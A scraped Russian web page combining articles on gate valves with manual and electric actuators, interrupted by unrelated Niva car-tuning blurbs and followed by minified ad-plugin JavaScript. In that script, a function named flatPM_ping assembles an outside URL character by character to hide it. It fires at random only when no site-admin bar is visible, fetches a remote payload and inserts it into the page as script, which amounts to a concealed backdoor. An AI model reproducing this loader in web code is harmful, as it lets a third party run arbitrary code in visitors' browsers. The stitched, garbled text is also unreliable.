Для того, чтобы быстро перекрыть рабочий поток, автоматизированное оборудование использовать не рекомендуется.

Обратите внимание

Однако подобная ситуация имеет и преимущество, так как при медленном закрытии заслонки возникнуть сильный гидравлический удар не сможет.

Байпасные линии чуть меньшего диаметра позволят исключить образование сильного гидроудара и одновременно уменьшить имеющуюся нагрузку на электрический привод.

Шток может использоваться как невыдвжиного, так и выдвижного типа со шпинделем. Выдвижные устройства имеют более приемлемую стоимость, однако строительная высота у них существенно больше, по сравнению с их невыдвижными аналогами.

Материал корпуса

Для изготовления оборудования может использоваться бронза, латунь, сталь или чугун. Муфтовый тип соединения используется при изготовлении бронзовых и латунных задвижек, диаметр которых не превышает отметку в 5 см. Однако используется подобное оборудование крайне редко.

Чугунные и стальные задвижки изготавливаются посредством межфланцевого и фланцевого соединения и имеют более широкое применение.

Такой тип оборудования способен решить множество различных задач общетехнического назначения, однако используется лишь на тех участках, на которых показатель рабочего давления не превышает отметку в 10 бар.

Сам по себе чугун достаточно хрупкий, поэтому требует более основательной защиты от изгибов, растяжений и других механических повреждений. Однако с каждым годом чугунные агрегаты становятся все менее востребованными в системах водоснабжения.

А вот в паровых системах их продолжают использовать также часто, так как они позволяют работать со сточными водами и еще более вязкими средами.

Стальные элементы следует монтировать на системах трубопроводом, которые характеризуются как крайне надежные, таких, как системы теплоснабжения.

Использование ручного привода со шланговой задвижкой

Этот тип арматуры принято считать наиболее оптимальным, с возможностью использования оборудования при регулировке движения пульпообразных, агрессивных и абразивных сред.

Необходимо принудительное зажатие механического привода и эластичного патрубка шланговой задвижки посредством специального механизма.

Он монтируется внутрь корпуса и приводится в действие одним из установленных приводов.

Важно

Механизм же представлен в виде нескольких планок, которые крепко охватывают монтированный патрубок, что позволяет ему перемещаться исключительно по установленным направляющим. А вот типы приводов, в комплекте с такими задвижками, могут устанавливаться разные.

Выбранный привод будет отвечать за перемещение планки, которая будет прижиматься посредством патрубка эластичного типа (по центру его длины зачастую). Только таким образом удается достигнуть оптимального показателя герметичности при запирании механизма.

Принудительная связь или геометрическое замыкание между прижимным механизмом и патрубком, способствует образованию необходимых характеристик, что, несомненно, является преимуществом использования подобных конструкций.

Для шланговой задвижки показатель рабочего давления должен составить 3-40 бар, в зависимости от диаметра прохода.

Источник: http://www.admiral-omsk.ru/zadvizhka-s-ruchnim-privodom

Задвижка с электроприводом, сферы применения, преимущества и принцип действия

Сетка в бампер и для решетки радиатора, купить недорогие алюминиевые сетки в бампер по низким ценам в интернет-магазине с доставкой по Москве и России, стоимость универсальных штатных и тюнинг сеток для радиаторных решеток, каталог оригинальных и неоригинаИспользуемая на специальных машинах защитная сетка на воздухозаборные отверстия автомобиля, нашла самое широкое применение на отечественных дорогах, среди серийных автомобилей. Популярность такого тюнинга

Тюнинг Нивы для бездорожьяВ далеком детстве, желая выпендриться, многие обвешивали велосипеды катафотами и трещалками. После этого наступала очередь мотоциклов, а затем уже – автомобилей. Но в данном случае никакие трещотки не

Внедорожный чип тюнинг Шеви Нива для бездорожьяТак уж получается, что отечественные автомобили снискали славу не самых удобных в мире. В том числе, и наши Нивы, которые не раз подвергались нападкам. Однако я не могу этого сказать о Ниве Шевроле, увидевшей

Тюнинг Нива Шевроле, 4х4 по доступной цене, запчасти для ремонта в ТольяттиNiva-Parts – динамично развивающаяся компания в сфере тюнинга и доработки внедорожников. Основные сферы деятельности: Собственное производство дополнительного и навесного оборудования и аксессуаров

Тюнинг Нивы 21213 (Аспект)Как сделать салон авто новым. Как правильно заменить уплотнитель двери ВАЗ НИВА Полностью убитый салон, правильного авто, делается новым за 2 часа, своими руками и за «копейки». Компания

Тюнинг Нивы для бездорожьяЕсли вы хотите эксплуатировать Ниву в условиях бездорожья, то эта статья специально для вас. Как можно тюнинговать Ниву, чтобы приспособить ее к экстремальным условиям езды? В первую очередь дорабатываем

Подфарники (надфарники) с ДХО на НивуОписание товара « Подфарники (надфарники) с ДХО Нива 4х4. » Подфарники на Ниву с ДХО 4х4 предназначены для замены пришедших в негодность штатных подфарников. Такая деталь станет несомненной отличительной

Новая «Нива Урбан» в кузове на 5 дверей появится в 2016 годуАвтоВАЗ решил вывести на рынок новую версию «городского внедорожника» Lada 4×4 Urban в пятидверном кузове, причем, ее продажи начнутся уже весной 2016 года, а цена составит 552 100 рублей. Напомним, что

Тюнинг ВАЗ 2131Очень часто у владельца автомобиля, в особенности ВАЗ 2131 нива , просыпается неуемное желание сделать что-то такое, чтобы их любимое транспортное средство стало более современнее и совершенствование.

Подфарник нового образца на нивуПодфарник На Ниву Нового Образца 0624 s — время запросы к базе данных 127 запросов 0. Подфарники Тоже установил подфарники нового образца 3644 работу php. образца на (ВАЗ 21214) левый и правый ниву

Источник: http://ostroff34.ru/statya/2011772387-zadvizhka-s-elektroprivodom-sfery-primeneniya-preimuschestva-i-princip-deystviya.html

Задвижки с электроприводом. Краткий обзор

   Задвижки с электроприводом играют ведущую роль среди регулирующей и запорной трубопроводной арматуры. Использование электропривода расширяет возможности задвижки, с ее помощью открывают, закрывают и регулируют потоки рабочей среды (вода, газ, горюче — смазочные материалы, химические соединения и т.д.).

Задвижка выполняет в основном две команды: открыть или закрыть трубопровод. Конкретная команда подается в зависимости от изменений того или иного подконтрольного параметра: расхода рабочей среды, давления, температуры.

Задвижка, работающая в системе управления комплексом, открывается или закрывается в зависимости от состояния вентиляторов или насосов.

   Задвижка с электроприводом автоматизирует управление рабочими средами в самых разных отраслях промышленности.

   Кода нужна задвижка с приводом? Управление рабочей средой выполняется дистанционно, если линия находится в небезопасном для человека месте, или если линия труднодоступна.

Задвижка с электроприводом. Особенности эксплуатации

   Электроприводные задвижки имеют более широкую область применения, по сравнению с задвижками с ручным управлением, потому что ими можно управлять как автоматически, так и вручную. Устройство электроприводной задвижки не отличается от устройства ручной задвижки.

Ограничения по диаметрам нет, крепление к трубе в основном фланцевое. Задвижки с электроприводом плавно регулируют поток, поэтому гарантируют отсутствие гидроударов. При том, что электропривод задвижки улучшает ее рабочие характеристики, он же и ограничивает область их применения.

Автоматически управляемые задвижки не устанавливают на взрывоопасных объектах.

Электропривод задвижки. Основные характеристики

   Если говорить в общем, то электропривода отличаются по мощности, крутящему моменту и типу подключения. Давайте рассмотрим их подробно. Основной характеристикой, по которой отличают привода, является конструкция редуктора, поэтому в зависимости о нее электропривод задвижки может быть:
цилиндрическим, червячным, планетарным, кулисно-винтовым.

   Если задвижку планируется использовать для регулирования рабочей среды, то для привода выбирается двигатель переменного тока, реже постоянного. В зависимости от условий работы оборудования и технологических требований выбирают один из следующих электроприводов: электронный, фрикционный, электромеханический, электромагнитный, электрический.

Из чего состоит электропривод задвижки?

   Электропривод состоит из редуктора, крепления, ручного тумблера, датчиков, указателя положения, электрических соединений, ручного дублера (нужен, если отключат электричество). Это основные элементы электропривода. Окончательные характеристики приводов определяются тем или иным видом задвижки, на которую его будут устанавливать.

Основные разновидности электроприводов для задвижек:

   — многооборотный;    — взрывозащищенный многооборотный;    — интегрированный многооборотный;

   — взрывозащищенный интегрированный многооборотный.

   Большой популярностью пользуются задвижки с электроприводом производства AUMA и «Тулаэлектропривод».

Электропривод AUMA,
режим открыть-закрыть
Комбинация привода с цилиндрическим редуктором
режим открыть-закрыть
Электропривод AUMA,
режим регулирования
Электропривод производства «Тулаэлектропривод»,
режим открыть-закрыть
Электропривод производства «Тулаэлектропривод»,
режим регулирования

   Нельзя забывать, что надежная работа всего комплекса зависит от того насколько задвижка с приводом соответствует задачам, поставленным перед конкретной технологической линией и климатическим условиям.
Специалисты помогут грамотно подобрать задвижки с электроприводом.

Цена комплекта состоит из стоимости самой задвижки и стоимости электропривода. Цена на электропривод зависит от марки и от необходимости в дополнительных блоках, например, в блоках дистанционного управления.

Обращайтесь к нам по телефонам +38(056) 796 90 80 или +38 (050) 342 33 60, получите консультацию по выбору электропривода, узнайте стоимость задвижки с электроприводом.

Источник: https://admiralzavod.com/zadvizhki_s_jelektroprivodom

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};